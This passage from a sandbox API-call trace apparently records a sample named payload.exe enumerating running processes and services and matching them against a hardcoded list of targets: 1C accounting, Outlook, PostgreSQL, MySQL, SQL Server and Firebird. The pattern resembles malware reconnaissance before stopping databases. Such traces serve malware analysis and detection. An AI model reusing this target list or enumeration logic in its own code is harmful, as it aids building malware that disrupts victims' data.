lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0267.451] lstrlenW (lpString="Power") returned 5 [0267.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0267.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0267.452] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0267.452] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0267.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0267.452] lstrlenW (lpString="ProfSvc") returned 7 [0267.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0267.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0267.452] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0267.452] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0267.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0267.452] lstrlenW (lpString="RpcEptMapper") returned 12 [0267.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0267.452] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0267.452] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0267.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0267.452] lstrlenW (lpString="RpcSs") returned 5 [0267.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0267.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0267.452] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0267.452] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0267.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0267.452] lstrlenW (lpString="SamSs") returned 5 [0267.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0267.452] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0267.452] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0267.452] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0267.452] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0267.452] lstrlenW (lpString="Schedule") returned 8 [0267.452] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0267.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0267.453] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0267.453] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0267.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0267.453] lstrlenW (lpString="SENS") returned 4 [0267.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0267.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0267.453] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0267.453] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0267.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0267.453] lstrlenW (lpString="ShellHWDetection") returned 16 [0267.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0267.453] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0267.453] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0267.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0267.453] lstrlenW (lpString="Spooler") returned 7 [0267.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0267.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0267.453] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0267.453] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0267.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0267.453] lstrlenW (lpString="Themes") returned 6 [0267.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0267.453] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0267.453] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0267.453] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0267.453] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0267.453] lstrlenW (lpString="UxSms") returned 5 [0267.453] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0267.454] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0267.454] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0267.454] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0267.454] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0267.454] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x57d8c0 | out: hHeap=0x520000) returned 1 [0267.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x348 [0267.455] Process32FirstW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0267.455] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0267.455] lstrlenW (lpString="System") returned 6 [0267.455] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0267.455] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0267.455] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0267.455] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0267.455] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0267.455] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0267.456] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0267.456] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0267.456] lstrlenW (lpString="smss.exe") returned 8 [0267.456] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0267.456] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0267.456] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0267.456] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0267.456] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0267.456] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0267.456] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0267.456] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.456] lstrlenW (lpString="csrss.exe") returned 9 [0267.456] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.456] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.456] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.456] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.457] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.457] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.457] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.457] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0267.457] lstrlenW (lpString="wininit.exe") returned 11 [0267.457] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0267.457] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0267.457] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0267.457] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0267.457] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0267.457] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0267.457] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0267.457] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0267.458] lstrlenW (lpString="csrss.exe") returned 9 [0267.458] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0267.458] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0267.458] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0267.458] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0267.458] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0267.458] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0267.458] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0267.458] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0267.458] lstrlenW (lpString="winlogon.exe") returned 12 [0267.458] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0267.458] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0267.458] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0267.458] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0267.458] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0267.458] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0267.458] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0267.458] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0267.459] lstrlenW (lpString="services.exe") returned 12 [0267.459] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0267.459] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0267.459] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0267.459] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0267.459] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0267.459] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0267.459] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0267.459] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0267.459] lstrlenW (lpString="lsass.exe") returned 9 [0267.459] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0267.459] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0267.459] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0267.459] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0267.459] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0267.459] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0267.459] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0267.459] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0267.460] lstrlenW (lpString="lsm.exe") returned 7 [0267.460] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0267.460] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0267.460] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0267.460] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0267.460] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0267.460] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0267.460] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0267.460] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.460] lstrlenW (lpString="svchost.exe") returned 11 [0267.460] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.460] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.460] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.460] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.460] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.460] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.460] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.460] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.461] lstrlenW (lpString="svchost.exe") returned 11 [0267.461] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.461] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.461] lstrlenW (lpString="svchost.exe") returned 11 [0267.461] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.461] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.461] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.462] lstrlenW (lpString="svchost.exe") returned 11 [0267.462] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.462] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.462] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.462] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0267.462] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0267.462] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0267.462] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0267.462] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.462] lstrlenW (lpString="svchost.exe") returned 11 [0267.462] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0267.462] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0267.462] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0267.462] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0267.462] lstrlenW (lpString="audiodg.exe") returned 11 [0267.462] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.463] lstrlenW (lpString="svchost.exe") returned 11 [0267.463] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.463] lstrlenW (lpString="svchost.exe") returned 11 [0267.463] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0267.463] lstrlenW (lpString="userinit.exe") returned 12 [0267.463] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0267.463] lstrlenW (lpString="dwm.exe") returned 7 [0267.463] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0267.464] lstrlenW (lpString="explorer.exe") returned 12 [0267.464] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0267.464] lstrlenW (lpString="spoolsv.exe") returned 11 [0267.464] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0267.464] lstrlenW (lpString="taskhost.exe") returned 12 [0267.464] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0267.465] lstrlenW (lpString="svchost.exe") returned 11 [0267.465] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0267.465] lstrlenW (lpString="payload.exe") returned 11 [0267.465] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0267.465] lstrlenW (lpString="dllhost.exe") returned 11 [0267.465] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0267.465] lstrlenW (lpString="reader_sl.exe") returned 13 [0267.465] Process32NextW (in: hSnapshot=0x348, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0267.466] CloseHandle (hObject=0x348) returned 1 [0267.466] Sleep (dwMilliseconds=0x1f4) [0268.095] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c06b0 [0268.102] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0268.103] GetLastError () returned 0xea [0268.103] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x43acc98 [0268.103] EnumServicesStatusExW (in: hSCManager=0x43c06b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x43acc98, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x43acc98, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0268.103] CloseServiceHandle (hSCObject=0x43c06b0) returned 1 [0268.104] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0268.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0268.104] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0268.104] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0268.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0268.104] lstrlenW (lpString="AudioSrv") returned 8 [0268.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0268.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0268.104] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0268.104] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0268.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0268.104] lstrlenW (lpString="BFE") returned 3 [0268.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0268.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0268.104] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0268.104] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0268.104] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0268.104] lstrlenW (lpString="CryptSvc") returned 8 [0268.104] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0268.104] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0268.105] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0268.105] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0268.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0268.105] lstrlenW (lpString="CscService") returned 10 [0268.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0268.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0268.105] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0268.105] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0268.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0268.105] lstrlenW (lpString="DcomLaunch") returned 10 [0268.105] lstrcmpiW 